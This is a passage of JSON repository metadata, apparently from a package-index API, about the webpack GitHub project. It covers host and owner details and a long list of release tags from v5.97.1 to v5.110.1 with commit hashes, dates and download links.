vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36974490,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.110.1","sha":"0b2952e15bb1aa9a198acbbfdcb9a0dc1aabb5af","kind":"commit","published_at":"2026-08-27T20:00:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1/manifests"},{"name":"v5.110.0","sha":"3a7c0e6e27f90f9c5e407c18506a5034aabcf27d","kind":"commit","published_at":"2026-08-27T11:27:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0/manifests"},{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed